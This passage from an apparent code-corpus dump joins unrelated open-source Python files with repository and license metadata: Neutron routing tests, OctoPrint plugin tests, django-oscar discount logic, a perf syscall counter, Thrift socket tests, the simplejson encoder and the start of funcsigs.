p['port']['id'])
self._update('routers', r['router']['id'],
{'router': {'routes': routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_no_destination_route(self):
self._test_malformed_route([{'nexthop': '10.0.1.6'}])
def test_no_nexthop_route(self):
self._test_malformed_route({'destination': '135.207.0.0/16'})
def test_none_destination(self):
self._test_malformed_route([{'destination': None,
'nexthop': '10.0.1.3'}])
def test_none_nexthop(self):
self._test_malformed_route([{'destination': '135.207.0.0/16',
'nexthop': None}])
def test_nexthop_is_port_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
port_ip = p['port']['fixed_ips'][0]['ip_address']
routes = [{'destination': '135.207.0.0/16',
'nexthop': port_ip}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_too_many_routes(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'},
{'destination': '192.168.0.0/16',
'nexthop': '10.0.1.6'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_dup_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_ip_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '512.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': '127.207.0.0/48',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': 'invalid_ip_address',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_nexthop_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 300.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_nexthop_is_outside_port_subnet(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 20.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_on_external_port(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
self._set_net_external(s['subnet']['network_id'])
self._add_external_gateway_to_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
net_id = body['router']['external_gateway_info']['network_id']
self.assertEqual(net_id, s['subnet']['network_id'])
port_res = self._list_ports(
'json',
200,
s['subnet']['network_id'],
tenant_id=r['router']['tenant_id'],
device_owner=constants.DEVICE_OWNER_ROUTER_GW)
port_list = self.deserialize('json', port_res)
self.assertEqual(len(port_list['ports']), 1)
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
body = self._update('routers', r['router']['id'],
{'router': {'routes':
routes}})
body = self._show('routers', r['router']['id'])
self.assertEqual(body['router']['routes'],
routes)
self._remove_external_gateway_from_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
gw_info = body['router']['external_gateway_info']
self.assertIsNone(gw_info)
def test_router_list_with_sort(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_sort('router', (router3, router2, router1),
[('name', 'desc')])
def test_router_list_with_pagination(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination('router',
(router1, router2, router3),
('name', 'asc'), 2, 2)
def test_router_list_with_pagination_reverse(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination_reverse('router',
(router1, router2,
router3),
('name', 'asc'), 2, 2)
class ExtraRouteDBIntTestCase(test_l3.L3NatDBIntTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self, plugin=None, ext_mgr=None):
if not plugin:
plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteIntPlugin')
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForIntTests, self).setUp(plugin=plugin,
ext_mgr=ext_mgr)
self.setup_notification_driver()
class ExtraRouteDBSepTestCase(test_l3.L3NatDBSepTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self):
# the plugin without L3 support
plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
# the L3 service plugin
l3_plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteL3NatServicePlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForSepTests, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.setup_notification_driver()
| apache-2.0 |
senttech/OctoPrint | tests/plugin/test_types_blueprint.py | 9 | 4161 | import unittest
import mock
import octoprint.plugin
class BlueprintPluginTest(unittest.TestCase):
def setUp(self):
self.basefolder = "/some/funny/basefolder"
self.plugin = octoprint.plugin.BlueprintPlugin()
self.plugin._basefolder = self.basefolder
class MyAssetPlugin(octoprint.plugin.BlueprintPlugin, octoprint.plugin.AssetPlugin):
def get_asset_folder(self):
return "/some/asset/folder"
class MyTemplatePlugin(octoprint.plugin.BlueprintPlugin, octoprint.plugin.TemplatePlugin):
def get_template_folder(self):
return "/some/template/folder"
self.assetplugin = MyAssetPlugin()
self.assetplugin._basefolder = self.basefolder
self.templateplugin = MyTemplatePlugin()
self.templateplugin._basefolder = self.basefolder
def test_route(self):
def test_method():
pass
octoprint.plugin.BlueprintPlugin.route("/test/method", methods=["GET"])(test_method)
octoprint.plugin.BlueprintPlugin.route("/test/method/{foo}", methods=["PUT"])(test_method)
self.assertTrue(hasattr(test_method, "_blueprint_rules"))
self.assertTrue("test_method" in test_method._blueprint_rules)
self.assertTrue(len(test_method._blueprint_rules["test_method"]) == 2)
self.assertListEqual(test_method._blueprint_rules["test_method"], [
("/test/method", dict(methods=["GET"])),
("/test/method/{foo}", dict(methods=["PUT"]))
])
def test_errorhandler(self):
def test_method():
pass
octoprint.plugin.BlueprintPlugin.errorhandler(404)(test_method)
self.assertTrue(hasattr(test_method, "_blueprint_error_handler"))
self.assertTrue("test_method" in test_method._blueprint_error_handler)
self.assertTrue(len(test_method._blueprint_error_handler["test_method"]) == 1)
self.assertListEqual(test_method._blueprint_error_handler["test_method"], [
404
])
def test_get_blueprint_kwargs(self):
import os
expected = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=os.path.join(self.basefolder, "templates")
)
result = self.plugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint_kwargs_assetplugin(self):
import os
expected = dict(
static_folder=self.assetplugin.get_asset_folder(),
template_folder=os.path.join(self.basefolder, "templates")
)
result = self.assetplugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint_kwargs_templateplugin(self):
import os
expected = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=self.templateplugin.get_template_folder()
)
result = self.templateplugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint(self):
import os
expected_kwargs = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=os.path.join(self.basefolder, "templates")
)
class MyPlugin(octoprint.plugin.BlueprintPlugin):
@octoprint.plugin.BlueprintPlugin.route("/some/path", methods=["GET"])
def route_method(self):
pass
@octoprint.plugin.BlueprintPlugin.errorhandler(404)
def errorhandler_method(self):
pass
@octoprint.plugin.BlueprintPlugin.route("/hidden/path", methods=["GET"])
def _hidden_method(self):
pass
plugin = MyPlugin()
plugin._basefolder = self.basefolder
plugin._identifier = "myplugin"
with mock.patch("flask.Blueprint") as MockBlueprint:
blueprint = mock.MagicMock()
MockBlueprint.return_value = blueprint
errorhandler = mock.MagicMock()
blueprint.errorhandler.return_value = errorhandler
result = plugin.get_blueprint()
self.assertEqual(result, blueprint)
MockBlueprint.assert_called_once_with("plugin.myplugin", "myplugin", **expected_kwargs)
blueprint.add_url_rule.assert_called_once_with("/some/path", "route_method", view_func=plugin.route_method, methods=["GET"])
blueprint.errorhandler.assert_called_once_with(404)
errorhandler.assert_called_once_with(plugin.errorhandler_method)
def test_get_blueprint_cached(self):
blueprint = mock.MagicMock()
self.plugin._blueprint = blueprint
result = self.plugin.get_blueprint()
self.assertEqual(blueprint, result)
| agpl-3.0 |
mexeniz/django-oscar | src/oscar/apps/offer/benefits.py | 22 | 11536 | from decimal import Decimal as D
from django.utils.translation import ugettext_lazy as _
from oscar.apps.offer import conditions, results, utils
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Benefit = get_model('offer', 'Benefit')
__all__ = [
'PercentageDiscountBenefit', 'AbsoluteDiscountBenefit', 'FixedPriceBenefit',
'ShippingBenefit', 'MultibuyDiscountBenefit',
'ShippingAbsoluteDiscountBenefit', 'ShippingFixedPriceBenefit',
'ShippingPercentageDiscountBenefit',
]
def apply_discount(line, discount, quantity):
"""
Apply a given discount to the passed basket
"""
line.discount(discount, quantity, incl_tax=False)
class PercentageDiscountBenefit(Benefit):
"""
An offer benefit that gives a percentage discount
"""
_description = _("%(value)s%% discount on %(range)s")
@property
def name(self):
return self._description % {
'value': self.value,
'range': self.range.name}
@property
def description(self):
return self._description % {
'value': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Percentage discount benefit")
verbose_name_plural = _("Percentage discount benefits")
def apply(self, basket, condition, offer, discount_percent=None,
max_total_discount=None):
if discount_percent is None:
discount_percent = self.value
discount_amount_available = max_total_discount
line_tuples = self.get_applicable_lines(offer, basket)
discount = D('0.00')
affected_items = 0
max_affected_items = self._effective_max_affected_items()
affected_lines = []
for price, line in line_tuples:
if affected_items >= max_affected_items:
break
if discount_amount_available == 0:
break
quantity_affected = min(line.quantity_without_discount,
max_affected_items - affected_items)
line_discount = self.round(discount_percent / D('100.0') * price
* int(quantity_affected))
if discount_amount_available is not None:
line_discount = min(line_discount, discount_amount_available)
discount_amount_available -= line_discount
apply_discount(line, line_discount, quantity_affected)
affected_lines.append((line, line_discount, quantity_affected))
affected_items += quantity_affected
discount += line_discount
if discount > 0:
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
class AbsoluteDiscountBenefit(Benefit):
"""
An offer benefit that gives an absolute discount
"""
_description = _("%(value)s discount on %(range)s")
@property
def name(self):
return self._description % {
'value': currency(self.value),
'range': self.range.name.lower()}
@property
def description(self):
return self._description % {
'value': currency(self.value),
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Absolute discount benefit")
verbose_name_plural = _("Absolute discount benefits")
def apply(self, basket, condition, offer, discount_amount=None,
max_total_discount=None):
if discount_amount is None:
discount_amount = self.value
# Fetch basket lines that are in the range and available to be used in
# an offer.
line_tuples = self.get_applicable_lines(offer, basket)
# Determine which lines can have the discount applied to them
max_affected_items = self._effective_max_affected_items()
num_affected_items = 0
affected_items_total = D('0.00')
lines_to_discount = []
for price, line in line_tuples:
if num_affected_items >= max_affected_items:
break
qty = min(line.quantity_without_discount,
max_affected_items - num_affected_items)
lines_to_discount.append((line, price, qty))
num_affected_items += qty
affected_items_total += qty * price
# Ensure we don't try to apply a discount larger than the total of the
# matching items.
discount = min(discount_amount, affected_items_total)
if max_total_discount is not None:
discount = min(discount, max_total_discount)
if discount == 0:
return results.ZERO_DISCOUNT
# Apply discount equally amongst them
affected_lines = []
applied_discount = D('0.00')
for i, (line, price, qty) in enumerate(lines_to_discount):
if i == len(lines_to_discount) - 1:
# If last line, then take the delta as the discount to ensure
# the total discount is correct and doesn't mismatch due to
# rounding.
line_discount = discount - applied_discount
else:
# Calculate a weighted discount for the line
line_discount = self.round(
((price * qty) / affected_items_total) * discount)
apply_discount(line, line_discount, qty)
affected_lines.append((line, line_discount, qty))
applied_discount += line_discount
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
class FixedPriceBenefit(Benefit):
"""
An offer benefit that gives the items in the condition for a
fixed price. This is useful for "bundle" offers.
Note that we ignore the benefit range here and only give a fixed price
for the products in the condition range. The condition cannot be a value
condition.
We also ignore the max_affected_items setting.
"""
_description = _("The products that meet the condition are sold "
"for %(amount)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Fixed price benefit")
verbose_name_plural = _("Fixed price benefits")
def apply(self, basket, condition, offer): # noqa (too complex (10))
if isinstance(condition, conditions.ValueCondition):
return results.ZERO_DISCOUNT
# Fetch basket lines that are in the range and available to be used in
# an offer.
line_tuples = self.get_applicable_lines(offer, basket,
range=condition.range)
if not line_tuples:
return results.ZERO_DISCOUNT
# Determine the lines to consume
num_permitted = int(condition.value)
num_affected = 0
value_affected = D('0.00')
covered_lines = []
for price, line in line_tuples:
if isinstance(condition, conditions.CoverageCondition):
quantity_affected = 1
else:
quantity_affected = min(
line.quantity_without_discount,
num_permitted - num_affected)
num_affected += quantity_affected
value_affected += quantity_affected * price
covered_lines.append((price, line, quantity_affected))
if num_affected >= num_permitted:
break
discount = max(value_affected - self.value, D('0.00'))
if not discount:
return results.ZERO_DISCOUNT
# Apply discount to the affected lines
discount_applied = D('0.00')
last_line = covered_lines[-1][1]
for price, line, quantity in covered_lines:
if line == last_line:
# If last line, we just take the difference to ensure that
# rounding doesn't lead to an off-by-one error
line_discount = discount - discount_applied
else:
line_discount = self.round(
discount * (price * quantity) / value_affected)
apply_discount(line, line_discount, quantity)
discount_applied += line_discount
return results.BasketDiscount(discount)
class MultibuyDiscountBenefit(Benefit):
_description = _("Cheapest product from %(range)s is free")
@property
def name(self):
return self._description % {
'range': self.range.name.lower()}
@property
def description(self):
return self._description % {
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Multibuy discount benefit")
verbose_name_plural = _("Multibuy discount benefits")
def apply(self, basket, condition, offer):
line_tuples = self.get_applicable_lines(offer, basket)
if not line_tuples:
return results.ZERO_DISCOUNT
# Cheapest line gives free product
discount, line = line_tuples[0]
apply_discount(line, discount, 1)
affected_lines = [(line, discount, 1)]
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
# =================
# Shipping benefits
# =================
class ShippingBenefit(Benefit):
def apply(self, basket, condition, offer):
condition.consume_items(offer, basket, affected_lines=())
return results.SHIPPING_DISCOUNT
class Meta:
app_label = 'offer'
proxy = True
class ShippingAbsoluteDiscountBenefit(ShippingBenefit):
_description = _("%(amount)s off shipping cost")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Shipping absolute discount benefit")
verbose_name_plural = _("Shipping absolute discount benefits")
def shipping_discount(self, charge):
return min(charge, self.value)
class ShippingFixedPriceBenefit(ShippingBenefit):
_description = _("Get shipping for %(amount)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Fixed price shipping benefit")
verbose_name_plural = _("Fixed price shipping benefits")
def shipping_discount(self, charge):
if charge < self.value:
return D('0.00')
return charge - self.value
class ShippingPercentageDiscountBenefit(ShippingBenefit):
_description = _("%(value)s%% off of shipping cost")
@property
def name(self):
return self._description % {
'value': self.value}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Shipping percentage discount benefit")
verbose_name_plural = _("Shipping percentage discount benefits")
def shipping_discount(self, charge):
discount = charge * self.value / D('100.0')
return discount.quantize(D('0.01'))
| bsd-3-clause |
TEAM-Gummy/android_kernel_samsung_d2 | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
akshaydeo/thrift | test/py/TestSocket.py | 99 | 2888 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys, glob
from optparse import OptionParser
parser = OptionParser()
parser.add_option('--genpydir', type='string', dest='genpydir', default='gen-py')
options, args = parser.parse_args()
del sys.argv[1:] # clean up hack so unittest doesn't complain
sys.path.insert(0, options.genpydir)
sys.path.insert(0, glob.glob('../../lib/py/build/lib.*')[0])
from ThriftTest import ThriftTest
from ThriftTest.ttypes import *
from thrift.transport import TTransport
from thrift.transport import TSocket
from thrift.protocol import TBinaryProtocol
import unittest
import time
import socket
import random
from optparse import OptionParser
class TimeoutTest(unittest.TestCase):
def setUp(self):
for i in xrange(50):
try:
# find a port we can use
self.listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = random.randint(10000, 30000)
self.listen_sock.bind(('localhost', self.port))
self.listen_sock.listen(5)
break
except:
if i == 49:
raise
def testConnectTimeout(self):
starttime = time.time()
try:
leaky = []
for i in xrange(100):
socket = TSocket.TSocket('localhost', self.port)
socket.setTimeout(10)
socket.open()
leaky.append(socket)
except:
self.assert_(time.time() - starttime < 5.0)
def testWriteTimeout(self):
starttime = time.time()
try:
socket = TSocket.TSocket('localhost', self.port)
socket.setTimeout(10)
socket.open()
lsock = self.listen_sock.accept()
while True:
socket.write("hi" * 100)
except:
self.assert_(time.time() - starttime < 5.0)
suite = unittest.TestSuite()
loader = unittest.TestLoader()
suite.addTest(loader.loadTestsFromTestCase(TimeoutTest))
testRunner = unittest.TextTestRunner(verbosity=2)
testRunner.run(suite)
| apache-2.0 |
zhangh43/incubator-hawq | tools/bin/ext/simplejson/encoder.py | 62 | 13024 | """
Implementation of JSONEncoder
"""
import re
try:
from simplejson import _speedups
except ImportError:
_speedups = None
ESCAPE = re.compile(r'[\x00-\x19\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"/]|[^\ -~])')
ESCAPE_DCT = {
# escape all forward slashes to prevent </script> attack
'/': '\\/',
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
# assume this produces an infinity on all machines (probably not guaranteed)
INFINITY = float('1e66666')
def floatstr(o, allow_nan=True):
# Check for specials. Note that this type of test is processor- and/or
# platform-specific, so do tests which don't depend on the internals.
if o != o:
text = 'NaN'
elif o == INFINITY:
text = 'Infinity'
elif o == -INFINITY:
text = '-Infinity'
else:
return repr(o)
if not allow_nan:
raise ValueError("Out of range float values are not JSON compliant: %r"
% (o,))
return text
def encode_basestring(s):
"""
Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
def encode_basestring_ascii(s):
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
try:
encode_basestring_ascii = _speedups.encode_basestring_ascii
_need_utf8 = True
except AttributeError:
_need_utf8 = False
class JSONEncoder(object):
"""
Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
__all__ = ['__init__', 'default', 'encode', 'iterencode']
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8'):
"""
Constructor for JSONEncoder, with sensible defaults.
If skipkeys is False, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is True, the output is guaranteed to be str
objects with all incoming unicode characters escaped. If
ensure_ascii is false, the output will be unicode object.
If check_circular is True, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is True, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is True, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
self.current_indent_level = 0
if separators is not None:
self.item_separator, self.key_separator = separators
self.encoding = encoding
def _newline_indent(self):
return '\n' + (' ' * (self.indent * self.current_indent_level))
def _iterencode_list(self, lst, markers=None):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
yield '['
if self.indent is not None:
self.current_indent_level += 1
newline_indent = self._newline_indent()
separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
separator = self.item_separator
first = True
for value in lst:
if first:
first = False
else:
yield separator
for chunk in self._iterencode(value, markers):
yield chunk
if newline_indent is not None:
self.current_indent_level -= 1
yield self._newline_indent()
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(self, dct, markers=None):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
key_separator = self.key_separator
if self.indent is not None:
self.current_indent_level += 1
newline_indent = self._newline_indent()
item_separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = self.item_separator
first = True
if self.ensure_ascii:
encoder = encode_basestring_ascii
else:
encoder = encode_basestring
allow_nan = self.allow_nan
if self.sort_keys:
keys = dct.keys()
keys.sort()
items = [(k, dct[k]) for k in keys]
else:
items = dct.iteritems()
_encoding = self.encoding
_do_decode = (_encoding is not None
and not (_need_utf8 and _encoding == 'utf-8'))
for key, value in items:
if isinstance(key, str):
if _do_decode:
key = key.decode(_encoding)
elif isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = floatstr(key, allow_nan)
elif isinstance(key, (int, long)):
key = str(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif self.skipkeys:
continue
else:
raise TypeError("key %r is not a string" % (key,))
if first:
first = False
else:
yield item_separator
yield encoder(key)
yield key_separator
for chunk in self._iterencode(value, markers):
yield chunk
if newline_indent is not None:
self.current_indent_level -= 1
yield self._newline_indent()
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(self, o, markers=None):
if isinstance(o, basestring):
if self.ensure_ascii:
encoder = encode_basestring_ascii
else:
encoder = encode_basestring
_encoding = self.encoding
if (_encoding is not None and isinstance(o, str)
and not (_need_utf8 and _encoding == 'utf-8')):
o = o.decode(_encoding)
yield encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield floatstr(o, self.allow_nan)
elif isinstance(o, (list, tuple)):
for chunk in self._iterencode_list(o, markers):
yield chunk
elif isinstance(o, dict):
for chunk in self._iterencode_dict(o, markers):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
for chunk in self._iterencode_default(o, markers):
yield chunk
if markers is not None:
del markers[markerid]
def _iterencode_default(self, o, markers=None):
newobj = self.default(o)
return self._iterencode(newobj, markers)
def default(self, o):
"""
Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, o)
"""
raise TypeError("%r is not JSON serializable" % (o,))
def encode(self, o):
"""
Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo":["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks...
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8' and _need_utf8)):
o = o.decode(_encoding)
return encode_basestring_ascii(o)
# This doesn't pass the iterator directly to ''.join() because it
# sucks at reporting exceptions. It's going to do this internally
# anyway because it uses PySequence_Fast or similar.
chunks = list(self.iterencode(o))
return ''.join(chunks)
def iterencode(self, o):
"""
Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
return self._iterencode(o, markers)
__all__ = ['JSONEncoder']
| apache-2.0 |
moutai/scikit-learn | sklearn/externals/funcsigs.py | 118 | 29982 | # Copyright 2001-2013 Python Software Foundation; All Rights Reserved
"""Function signature objects for callables
Back port of Python 3.3's function signature tools from the inspect module,
modified to be compatible with Python 2.6, 2.7 and 3.2+.
"""
from __future__ import absolute_import, division, print_function
import itertools
import functools
import re
import types
try:
from collections import OrderedDict
except ImportError:
from .odict import OrderedDict
